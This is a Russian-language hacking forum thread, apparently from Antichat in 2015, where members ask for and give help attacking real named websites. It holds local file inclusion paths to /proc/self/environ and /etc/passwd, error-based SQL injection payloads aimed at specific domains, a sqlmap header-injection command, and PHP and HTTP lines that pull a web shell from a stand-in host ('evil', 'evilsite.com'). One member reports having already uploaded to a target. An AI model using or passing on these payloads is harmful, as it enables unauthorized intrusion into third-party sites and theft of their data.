Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. huntercs16

    huntercs16 Member

    Joined:
    7 Oct 2013
    Messages:
    138
    Likes Received:
    14
    Reputations:
    6
    Code:
    http://pelczar.rzeszow.pl/duszpasterstwoszpitala/index.php?action=aktualnosci/../../../../../../../../../../../../../../../proc/self/environ/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././
    
    Тоже енвайрон. Что сделать можно?

    В данном случае base64 не помог
     
  2. Br@!ns

    [email protected]!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    915
    Likes Received:
    120
    Reputations:
    25
  3. Br@!ns

    [email protected]!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    915
    Likes Received:
    120
    Reputations:
    25
    Запрос
    Code:
    union+select+count(table_name),2,3,4,5+from+information_schema.tables+limit+0,1+--+
    выдает 188 колонок. Однако при просмотре после limit 44,1 , выдается пустое поле. Обрывается все на букве "b", так что думаю что там на самом деле имеется много полей. С чем может быть связано данное явление?
     
  4. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    886
    Reputations:
    363
    Code:
    https://www.danscomp.com/showfullimage.php?type=products&image=kkk'and(extractvalue(1,repeat(version(),2)))='1
    дальше будет сложнее, много всего фильтруется.

    ничего не понял. давайте линк, посмотрю
    можно бы было, если бы кавычки не экранировались:
    Code:
    http://www.inkaddict.com/search.php?query=lol
     
    _________________________
    [email protected]!ns likes this.
  5. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    886
    Reputations:
    363
    видим, что в ответе есть строка с user-agent. смотрим phpinfo():
    allow url open on
    вставляем строку
    PHP:
    <?php copy("http://evil/shell.txt,"./sh.php"); ?>
    получаем шелл. для начала можно залить простой аплоадер
     
    _________________________
  6. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,562
    Reputations:
    40
    Здравствуйте. Дайте пожалуйста подсказку как раскручивать такие инъекции
    HTML:
    http://emofans.ru/gallery/emowallp
    пост данные
    PHP:
    foto_msort=&foto_sort=<- уязвимый параметр 
    сообщение
     
  7. frank

    frank Level 8

    Joined:
    8 May 2015
    Messages:
    200
    Likes Received:
    95
    Reputations:
    28
    Доброй пятницы :)

    вот такими способами не пробовал ?

    Code:
    нъекция после order by
    
    Слепая (more than 1 row)
    script.php?par=(select if(substring(version(),1,1)=4,1,(select 1 union select 2)))
    
    В ошибке
    (ExtractValue)
    script.php?par=id,ExtractValue(1,concat(0x5c,(sele ct table_name from information_schema.tables limit 1)))--
    (rand)
    script.php?par=(select 1 from (select count(0),concat((select version()),floor(rand(0)*2)) from information_schema.tables group by 2 limit 1)a)--
    (name_const)
    script.php?par=(select*from(select name_const(version(),1),name_const(version(),1))a)
    
    
    копипаста с
    https://rdot.org/forum/showthread.php?t=60
     
    yarbabin and BabaDook like this.
  8. huntercs16

    huntercs16 Member

    Joined:
    7 Oct 2013
    Messages:
    138
    Likes Received:
    14
    Reputations:
    6
    Ребята, есть LFI на сайте
    Code:
    http://alltrim.com.pl/technologie.php?cont=../../../../../../../../../../../../../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
    
    еррор лог лежит тут: ../../../../../../../../../../../../var/log/httpd/error_log
    Но он не содержит referer.
    Что нибудь можно сделать?
     
  9. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    886
    Reputations:
    363
    да не, с инклудом варианты всегда есть:
    1. понять, откуда пишутся логи в еррор_лог, отправить запрос
    Code:
    GET /index.php/<?php include("http://evilsite.com/yourShell.php"); ?> HTTP/1.0
    или с некорректным методом.
    2. у вас огромный список сайтов на этом хосте (http://devel.wtf/reverse/alltrim.com.pl) ищите тот, где доступна заливка файлов и инклудте

    например, http://agzeta.pl/index.php/forum/profile/personality
     
    _________________________
  10. reuvenmatbil

    reuvenmatbil New Member

    Joined:
    1 Sep 2012
    Messages:
    29
    Likes Received:
    4
    Reputations:
    0
    имею ссылку вида
    https://site.net/desktop/index.php

    акунетикс показывает
    X-Forwarded-For: 1'"

    и получается You have an error in your SQL syntax


    как это дело заюзать в sqlmap?
     
  11. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    886
    Reputations:
    363
    не уверен, но попробуйте так:
    Code:
    sqlmap -u "http://site.net/desktop/index.php" --headers="X-Forwarded-For: *" --dbs
     
    _________________________
    reuvenmatbil likes this.
  12. huntercs16

    huntercs16 Member

    Joined:
    7 Oct 2013
    Messages:
    138
    Likes Received:
    14
    Reputations:
    6
  13. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    886
    Reputations:
    363
    я же вам уже подсказывал в аналогичной ситуации. реферрер!
     
    _________________________
    frank likes this.
  14. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,777
    Likes Received:
    848
    Reputations:
    857
    Посочувствовать вашему опыту... Ведь перед вами настоящая LFI

    [​IMG]
     
    _________________________
    huntercs16 and frank like this.
  15. vikler

    vikler Member

    Joined:
    16 Aug 2012
    Messages:
    93
    Likes Received:
    7
    Reputations:
    0
    Ребят, помогите раскрутить. post инъекция в поле id
    Code:
    http://mail.topicimages.com/groupware/login.php
    data:
    Code:
    mode=login&hmail_domain=topicimages.com&usb=&mac=&hmail_id=d'&hmail_pass=9&ck1=&ck2=
     
  16. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    886
    Reputations:
    363
    mode=login&hmail_domain=topicimages.com&usb=&mac=&hmail_id=d'and(extractvalue(1,concat(0x3a,version())))='1&hmail_pass=9&ck1=&ck2=
     
    _________________________
  17. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Тоже хочу что-нибудь заскринить

    [​IMG]
     
  18. huntercs16

    huntercs16 Member

    Joined:
    7 Oct 2013
    Messages:
    138
    Likes Received:
    14
    Reputations:
    6
    Да я уже залился туда, спасибо.
    Плагин глючит, который куки ставит
     
  19. Merl0k

    Merl0k New Member

    Joined:
    17 Oct 2011
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    Всем доброго дня. ) Наткнулся на сайте канала Перец на такой вот запрос: http://peretz.ru/ frontend_dev.php который вывел меня на панель БД. Сам я по БД не спец, поэтому обращаюсь к вам с вопросом можно ли выудить что-нибудь вкусное отсюда? :)
     
  20. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,562
    Reputations:
    40
    Доброе утро! Подскажите пожалуйста, тут можно что-нибудь сделать?
    PHP:
    http://kenford.com.ua/wp-content/plugins/jquery-vertical-mega-menu/skin.php?skin=jj
    frank, дружище, ты как всегда на высоте
     
Loading...